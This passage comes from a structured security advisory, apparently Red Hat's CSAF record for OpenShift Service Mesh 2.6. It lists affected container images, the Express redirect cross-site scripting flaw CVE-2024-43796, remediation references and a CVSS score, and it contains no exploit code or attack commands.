"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule", }, { cve: "CVE-2024-43796", cwe: { id: "CWE-79", name: "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')", }, discovery_date: "2024-09-10T15:30:28.106254+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "2311152", }, ], notes: [ { category: "description", text: "A flaw was found in Express. This vulnerability allows untrusted code execution via passing untrusted user input to response.redirect(), even if the input is sanitized.", title: "Vulnerability description", }, { category: "summary", text: "express: Improper Input Handling in Express Redirects", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-43796", }, { category: "external", summary: "RHBZ#2311152", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311152", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-43796", url: "https://www.cve.org/CVERecord?id=CVE-2024-43796", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-43796", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-43796", }, { category: "external", summary: "https://github.com/expressjs/express/commit/54271f69b511fea198471e6ff3400ab805d6b553", url: "https://github.com/expressjs/express/commit/54271f69b511fea198471e6ff3400ab805d6b553", }, { category: "external", summary: "https://github.com/expressjs/express/security/advisories/GHSA-qw6h-vgh9-j6wx", url: "https://github.com/expressjs/express/security/advisories/GHSA-qw6h-vgh9-j6wx", }, ], release_date: "2024-09-10T15:15:17.510000+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-07T09:24:48+00:00", details: "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:7726", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64", ], }, ], scores: [ { cvss_v3: { attackComplexity: "HIGH", attackVector: "NETWORK", availabilityImpact: "LOW", baseScore: 5, baseSeverity: "MEDIUM", confidentialityImpact: "LOW", integrityImpact: "LOW", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "REQUIRED", vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L", version: "3.1", }, products: [ "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x", 